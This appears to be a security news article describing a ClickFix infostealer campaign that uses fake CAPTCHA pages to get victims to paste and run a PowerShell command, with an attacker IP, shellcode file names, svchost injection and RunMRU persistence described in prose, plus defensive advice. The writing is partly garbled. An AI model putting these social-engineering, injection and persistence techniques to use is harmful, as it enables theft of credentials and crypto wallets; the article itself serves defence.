Uses of ClickFix Infostealer Campaigns False CAPTCHA Attracts Victims to Compromise

A clever new malware campaign has surfaced that uses phony CAPTCHA lures to trick users and install a covert data thief This article explores actions malicious script. . This activity, which was discovered in early 2026, exhibits notable behavioral similarities to the ClickFix campaign, which was previously directed at restaurant reservation systems in July 2025.

In order to successfully get around conventional security measures and obtain initial access to victim systems, the operators have honed their social engineering techniques. When a user accesses a compromised website that displays a false CAPTCHA verification page, the attack starts. This page deceives the victim into manually running a malicious PowerShell command after copying it to their clipboard. This "ClickFix" method circumvents automated security sandboxes, which normally examine file downloads instead of manual command execution, by taking advantage of human interaction.

Data from the clipboard (Source: Cyber Proof) The command starts a download from the IP 91.92.240.219 of the attacker's infrastructure. Before continuing, the malware uses particular API calls to read the clipboard and confirm the user's actions. The malicious script starts a multi-stage infection process intended to steal confidential information after it is executed.

The malware targets a variety of applications, such as enterprise VPN configurations, cryptocurrency wallets like MetaMask, and more than 25 web browsers. Before exfiltration, the campaign looks for virtual environments and active security tools, according to Cyber Proof analysts. The impact is severe because it gives attackers access to financial assets and vital credentials, which they can use to monetize compromised accounts or gain further access to corporate networks.

Injection and Persistence of the Process To remain undetected on compromised devices, the malware uses sophisticated process injection. It downloads a position-independent shellcode file called cptch.bin from the attacker's infrastructure following the first PowerShell execution. Additionally, analysts noticed an operational security flaw in which Microsoft Defender detected the attacker's use of the variable $finalPayload.

This enables the payload to run directly in memory and was generated using the Donut framework. Loading of cptch.bin (Source: Cyber Proof) In order to conceal its malicious activity, the shellcode uses common Windows APIs like VirtualAlloc to allocate memory within benign processes like svchost.exe. The attackers alter the RunMRU registry key to make sure the infection endures reboots.

This change re-starts the payload download by forcing the computer to run the malicious PowerShell command. RUNMRU key persistence (Source: Cyber Proof) Long-term access is guaranteed by this persistence mechanism. To get around hash-based blocking techniques, the actors also rotate payload filenames, like cptchbuild.bin.

Users should be made aware of the dangers of executing commands from web pages by organizations. Security teams need to keep an eye out for certain registry changes and odd PowerShell execution. Setting ZeroOwl as a Preferred Source in Google, as well as implementing endpoint detection rules that flag clipboard data reading by browser processes, can help detect this attack early.